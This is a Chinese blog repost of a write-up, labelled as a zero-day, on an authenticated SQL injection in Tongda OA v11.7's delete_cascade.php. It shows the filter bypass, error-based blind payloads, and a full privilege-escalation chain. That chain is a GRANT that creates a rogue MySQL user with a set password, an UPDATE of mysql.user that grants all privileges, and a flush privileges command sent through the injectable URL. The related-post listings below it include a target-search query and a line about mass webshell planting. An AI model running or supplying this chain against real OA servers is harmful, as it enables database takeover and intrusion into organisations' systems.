sql server alter权限_通达OA v11.7后台SQL注入到RCE[0day]

最新推荐文章于 2021-07-08 20:37:34 发布
最新推荐文章于 2021-07-08 20:37:34 发布
阅读量201 收藏
点赞数
文章标签: sql server alter权限
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39611331/article/details/111390187
版权

565c33e5ccf1e4c6c1ae838d12eb22b4.png

1.测试环境

测试版本:通达OA v11.7版本

限制条件:需要账号登录

2.代码审计发现注入

注入出现在general/hr/manage/query/delete_cascade.php文件中,代码实现如下:

a50161daf42117bf32802f0cc0077ec2.png

首先判断$condition_cascade是否为空,如果不为空,则将其中的'替换为'。为什么要这样替换呢,主要是因为V11.7版本中,注册变量时考虑了安全问题,将用户输入的字符用addslashes函数进行保护,如下:

inc/common.inc.php代码

7b5793f63a7fc7fedfe83dbc18742e92.png

因为是无回显机制,是盲注,所以尝试(select 1 from (select sleep(5))a),结果没那么简单:

e753ce932e8651a21d158947050650ae.png

触发了通达OA的过滤机制,翻看代码,在inc/conn.php文件中找到过滤机制如下:

bc61e60edc4f41301a1d74cc6f58655f.png

其过滤了一些字符,但是并非无法绕过,盲注的核心是:substr、if等函数,均未被过滤,所以还是有机会的。

传入错误的SQL语句时,页面出错:

edf0e515ca1a34939222d425dd64b4e8.png

那么只要构造MySQL报错即可配合if函数进行盲注了,翻看局外人师傅在补天白帽大会上的分享,发现power(9999,99)也可以使数据库报错,所以构造语句:

select if((substr(user(),1,1)='r'),1,power(9999,99)) # 当字符相等时,不报错,错误时报错

11cd475d510e16a4eef8315e9d032a2e.png

79274eeedb281c6b94933613a1a6b19c.png

3.构造利用链

添加用户

grant all privileges ON mysql.* TO 'at666'@'%' IDENTIFIED BY 'abcABC@123' WITH GRANT OPTION

c0628bde90e0ccb335849e4875803f97.png

e477e2cf70f8d69afebaaba47ba6a7cb.png

然后该用户是对mysql数据库拥有所有权限的,然后给自己加权限:

UPDATE `mysql`.`user` SET `Password` = '*DE0742FA79F6754E99FDB9C8D2911226A5A9051D', `Select_priv` = 'Y', `Insert_priv` = 'Y', `Update_priv` = 'Y', `Delete_priv` = 'Y', `Create_priv` = 'Y', `Drop_priv` = 'Y', `Reload_priv` = 'Y', `Shutdown_priv` = 'Y', `Process_priv` = 'Y', `File_priv` = 'Y', `Grant_priv` = 'Y', `References_priv` = 'Y', `Index_priv` = 'Y', `Alter_priv` = 'Y', `Show_db_priv` = 'Y', `Super_priv` = 'Y', `Create_tmp_table_priv` = 'Y', `Lock_tables_priv` = 'Y', `Execute_priv` = 'Y', `Repl_slave_priv` = 'Y', `Repl_client_priv` = 'Y', `Create_view_priv` = 'Y', `Show_view_priv` = 'Y', `Create_routine_priv` = 'Y', `Alter_routine_priv` = 'Y', `Create_user_priv` = 'Y', `Event_priv` = 'Y', `Trigger_priv` = 'Y', `Create_tablespace_priv` = 'Y', `ssl_type` = '', `ssl_cipher` = '', `x509_issuer` = '', `x509_subject` = '', `max_questions` = 0, `max_updates` = 0, `max_connections` = 0, `max_user_connections` = 0, `plugin` = 'mysql_native_password', `authentication_string` = '', `password_expired` = 'Y' WHERE `Host` = Cast('%' AS Binary(1)) AND `User` = Cast('at666' AS Binary(5));

4772dd989591d8b35dea879deb1db734.png

然后用注入点刷新权限,因为该用户是没有刷新权限的权限的:general/hr/manage/query/delete_cascade.php?condition_cascade=flush privileges;这样就拥有了所有权限。再次登录:

b4e4da9254b62e374e3c6a7b0ee344eb.png

提示这个,或者让改密码死活改不了。再执行一下

grant all privileges ON mysql.* TO 'at666'@'%' IDENTIFIED BY 'abcABC@1

23' WITH GRANT OPTION

即可。

ae473dce0882d8e7b377e1f99a9eb7df.png

895437f819914f486d22b6994e0fe37e.png

文章来源:一个安全研究员公众号

weixin_39611331
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
html sql注入_常见SQL注入的方法
weixin_39894233的博客
12-01 1490
WEB安全之SQL注入引言:在开发网站的时候,出于安全考虑,需要过滤从页面传递过来的字符。通常,用户可以通过以下接口调用数据库的内容:URL地址栏、登陆界面、留言板、搜索框等。这往往给骇客留下了可乘之机。轻则数据遭到泄露,重则服务器被拿下。1、SQL注入步骤a)寻找注入点,构造特殊的语句传入SQL语句可控参数分为两类1. 数字类型,参数不用被引号括起来,如?id=12. 其他类型,参...
华天OA漏洞复现手册
1stPeak's Blog
04-21 5352
前言:万户OA产品漏洞复现笔记,供自己使用,不定期更新 声明:本人所有文章均为技术分享,请勿非法用于其他用途,否则后果自负。 漏洞列表: 用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞 万户OA download_ftp.jsp 任意文件下载漏洞 漏洞描述 万户OA download_ftp.jsp文件存在任意文件下载漏洞,攻击者通过漏洞可以下载服务器上的任意文件 漏洞影响 万户OA 网络测绘 app="万户网络-ezOFFICE" 漏洞复现 ...
通达OA 11.7 后台sql注入getshell漏洞复现
Adminxe的博客
09-23 1613
0x00 漏洞描述 通达OA 11.7存在sql注入 0x01 漏洞影响版本 通达oa 11.7 利用条件:需要账号登录 0x02 漏洞复现 1、下载通达OA 11.7,https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe,点击安装 2、condition_cascade参数存在布尔盲注 POC: GET /general/hr/manage/query/delete_cascade.php?condition_cascade=se...
通达OA后台SQL注入RCE
box
09-18 1991
0x00 前戏 一趟护网下来大佬们收割了一大波0day,奈何自己没有没有技术,只能打打靶机。 可能是自己比较菜原因,复现过程中遇到不少坑。 0x01 测试环境 测试版本:11.5.200417 版本 限制条件:需要账号登录 大佬们说是 通达OA v11.7版本,但是试了试 11.5.200417 版本也是同样存在 SQL注入的,更惊喜的是,刚好可以使用11.5版本的前台任意用户登录漏洞,绕过登录需要登录这一条件。 漏洞原理代码分析可以参考云川安全团队的师傅的文章 0x02 漏洞复现 漏洞url:http:
SQL语言基础:SQL授权相关知识笔记​
IT技术分享社区
11-24 658
1、数据控制数据控制是控制对用户存取的权力,由DBA来决定。DBMS数据控制与功能:1、通过GRANT和REVOKE将授权通知系统,并存入数据字典。2、当用户...
通达OA v11.7后台SQL注入
qq_44657899的博客
07-08 1528
文章目录漏洞描述漏洞影响漏洞复现 漏洞描述 通达OA v11.7后台存在SQL注入,可通过此漏洞写入恶意后门文件攻击目标服务器。 漏洞影响 通达OA <= v11.7 漏洞复现 下载通达oa 11.7,https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe 漏洞位置:/general/hr/manage/query/delete_cascade.php ...
MS_Sql_Server_log_clear.rar_MS SQL Server_delphi sql
09-21
【标题】MS SQL Server日志清理工具 - Delphi开发的SQL助手 【描述】这个压缩包包含一个专门用于清除Microsoft SQL Server数据库日志信息的程序及其Delphi源代码。通过这个程序,用户可以有效地管理数据库的日志...
SQL语法大全中文版.rar_sql_sql 语法_sql server_sql 语法_sql语法
09-24
SQL(Structured Query Language)是用于管理和操作关系数据库的语言,它被广泛应用于各种数据库系统,如MySQL、Oracle、SQL Server等。以下是对SQL语法大全中文版的一些核心知识点的详细阐述: 1. **数据定义语言...
shujuku.rar_SQL Server2005_shujuku_教案_数据库 ppt
最新发布
09-24
SQL Server 2005】 SQL Server 2005是微软公司推出的一款关系型数据库管理系统(RDBMS),它在SQL Server 2000的基础上进行了大量的改进和扩展,提供了更强大的数据存储、管理和分析功能。SQL Server 2005支持T-...
sy.rar_SQL_Server_Windows_Unix_
08-11
首先,你需要通过SQL Server Management Studio (SSMS) 或命令行工具如sqlcmd来连接到服务器实例。然后,你可以使用CREATE DATABASE语句来定义新的数据库,包括指定数据库名称、文件位置、大小等参数。 "怎样修改...
SQL Server精华 (CHM).rar_SQL Server 2008 chm_sql referen_sql serve
09-21
SQL Server精华 (CHM).rar》是一个针对SQL Server 2008的综合参考资源,包含了大量的SQL Server知识和技巧。此压缩包中的主要内容是一个名为"SQL Server精华 (CHM).chm"的文件,这是一种Windows帮助文档格式,通常...
通达OA2017版连接sqlserver2008数据库
06-05 4113
通达OA2017版连接sqlserver2008数据库
【漏洞复现】通达OA v11.7 在线任意用户登录漏洞
Adminxe的博客
03-08 7015
0x00 前言 通达OA V11.7版本存在这任意用户登录漏洞,该漏洞需要管理员在线才可以登录系统,另外一个方面就是编译在线的uid值进行判断。 具体fofa语法放在下面: app="TDXK-通达OA" 0x01 在线用户判断 访问 : http://xxx.xxx.xxx.xxx/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 如果页面时空白的,则说明管理员在线,即可以利用 如果显示RELOGIN,则不...
通过oa后台入侵mysql_通达OA v11.7后台SQL注入RCE[0day]
weixin_42602726的博客
01-30 156
文章来源:一个安全研究员1.测试环境测试版本:通达OA v11.7版本限制条件:需要账号登录2.代码审计发现注入注入出现在general/hr/manage/query/delete_cascade.php文件中,代码实现如下:首先判断$condition_cascade是否为空,如果不为空,则将其中的'替换为'。为什么要这样替换呢,主要是因为V11.7版本中,注册变量时考虑了安全问题,将用户输入...
通过oa后台入侵mysql_通达OA 11.7 后台sql注入getshell漏洞复现
weixin_36459547的博客
01-28 240
0x00 漏洞描述通达OA 11.7存在sql注入0x01 漏洞影响版本通达oa 11.7利用条件:需要账号登录0x02 漏洞复现1、下载通达OA 11.7,https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe,点击安装2、condition_cascade参数存在布尔盲注POC:GET /general/hr/manage/query/delet...
sql注入获取网站后台管理员账号与密码
热门推荐
longanquan的博客
07-27 1万+
利用联合查询获取cms 网站后台管理员帐密 环境介绍 物理机:Firefox浏览器(上加入hackbar插件) win2008虚拟机:搭建有cms网站(不会搭建的可以看我前面的博客) 判断网站是否存在sql注入漏洞 我们用物理机的Firefox浏览器访问虚拟机上的cms网站,F12打开开发者工具,在后面可以看到hackbar工具,点到该工具窗口。 首先我们先用最简单的方法判断是否存在漏洞。我们需要把地址框中的内容复制到hackbar框中,更改id的值,如果数据库中的内容回显到网页中,说明存在漏洞。 很
通达OA 数据库连接参数设置(图文)
小飞鱼通达 二开
05-17 5821
最近在做的一个软件测试时,需要使用大量并发的数据库连接,而在使用过程中发现很快就已经达到连接数而出现程序连接不上数据库的情况。查找配置文件,可以通过修改下面的参数对连接数进行调整,同时可以修改超时时间,默认是30,这个一般不用修改。
批量拿php webshell,剑眉大侠:批量入侵网站拿webshell挂广告引流!
weixin_42309599的博客
03-13 1582
剑眉大侠:批量入侵网站拿webshell挂广告引流!2019/01/27, 剑眉大侠, 5每个网站都是有流量的,除非你的网站从来不做推广,比如首先,你要思考清楚一点:你需要什么流量?比如你做网赚项目培训的,那肯定就是需要网赚流量;比如你是做女性相关产品的,那肯定就是需要女性流量;相反,如果你是做男性相关产品的,那肯定就是需要男性流量。然后,根据你需要的流量类型,通过行业搜索找到大量的精准网站,比...
通达OA1.5SQL注入漏洞复现
weixin_51716781的博客
05-10 370
通达OA1.5漏洞复现 本文章记录初学者的笔记,仅限于渗透测试,请勿做违法操作,如出现问题与本作者无关 1:测试机上安装通达OA11.5版本:查看IP地址为:192.168.78.150 2:登录admin账号:创建一个普通职员权限 3:登录普通用户的权限,使用bp抓包:构造URL: /general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2 or sleep(0) 判断是否存在sql注入 4:图三
SQL Server数据库管理:ALTER DATABASE语法详解
"这篇PPT主要讲解了如何在SQL Server中修改数据库的语法,并涵盖了数据库原理、SQL Server的使用以及数据库管理等多个方面的内容。课程考核包括考勤、知识点测验和期末考试。PPT详细介绍了SQL Server 2005的安装与...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值